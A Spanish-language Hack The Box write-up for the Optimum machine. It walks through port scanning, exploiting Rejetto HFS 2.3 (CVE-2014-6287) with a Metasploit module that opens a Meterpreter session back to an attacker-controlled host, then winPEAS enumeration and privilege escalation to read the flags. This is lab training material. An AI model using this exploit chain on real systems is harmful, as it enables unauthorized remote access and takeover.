
Writeup de la máquina Optimum de Hack The Box. Este walkthrough cubre la explotación de Rejetto HttpFileServer 2.3 (CVE-2014-6287) para obtener acceso inicial, seguido de la escalada de privilegios en un host Windows mediante técnicas de enumeración y herramientas de post-explotación.
En esta máquina, el objetivo es obtener acceso inicial a un host Windows explotando un servicio web vulnerable y luego escalar privilegios para obtener la bandera de administrador.
La ruta de ataque involucró:
Comenzamos con un escaneo completo de puertos TCP para identificar servicios expuestos.
nmap -Pn -n -p- --min-rate 5000 -T4 <IP_OBJETIVO>
El escaneo revela el puerto 80 abierto.
A continuación, realizamos un escaneo de servicio y versión.
nmap -p80 -sSCV --min-rate 5000 -T4 <IP_OBJETIVO>
El resultado identifica el siguiente servicio:
HttpFileServer 2.3
Este servicio corresponde a Rejetto HTTP File Server, un servidor web ligero para compartir archivos.
Después de investigar la versión detectada, descubrimos una vulnerabilidad conocida:
CVE-2014-6287
Esta vulnerabilidad permite ejecución remota de código debido a una sanitización incorrecta de las entradas.
Para explotar la vulnerabilidad, usamos Metasploit.
Iniciamos Metasploit:
msfconsole -q
Buscamos el módulo adecuado:
search rejetto
Cargamos el módulo de explotación:
use exploit/windows/http/rejetto_hfs_exec
Configuramos las opciones requeridas:
set RHOSTS <IP_OBJETIVO>
set RPORT <PUERTO_OBJETIVO>
set LHOST <IP_ATACANTE>
set LPORT <PUERTO_ATACANTE>
run
Una vez ejecutado, el exploit proporciona una sesión de Meterpreter en la máquina objetivo.
Con la sesión de Meterpreter obtenida, navegamos por el sistema de archivos para recuperar la bandera de usuario.
cd
cat user.txt
whoami
La salida del comando muestra que estamos conectados como:
kostas
Dado que este usuario no tiene privilegios administrativos, procedemos con la escalada de privilegios.
Para identificar posibles vectores de escalada de privilegios, subimos WinPEAS, una conocida herramienta de enumeración para escalada de privilegios en Windows.
upload /usr/share/peass/winpeas/winPEAS.exe C:\Users\kostas\Desktop\wp.exe
Luego lo ejecutamos:
shell
.\wp.exe
La salida revela información útil, incluyendo credenciales asociadas al usuario kostas.
Después de revisar los posibles vectores de escalada, usamos el módulo de Metasploit:
local_exploit_suggester
Cargamos el módulo:
use post/multi/recon/local_exploit_suggester
Configuramos la sesión:
set SESSION <NUMERO_DE_SESION>
run
Este módulo sugiere posibles exploits locales que se pueden usar para escalar privilegios.
Después de escalar privilegios exitosamente, obtenemos una shell con derechos administrativos.
Verificación:
shell
whoami
Una vez que se obtienen los privilegios de administrador, navegamos al directorio del Administrador para recuperar la bandera root.
cd \Users\Administrator
dir
cd Desktop
dir
type root.txt
Esta máquina demuestra varios conceptos importantes de pruebas de penetración: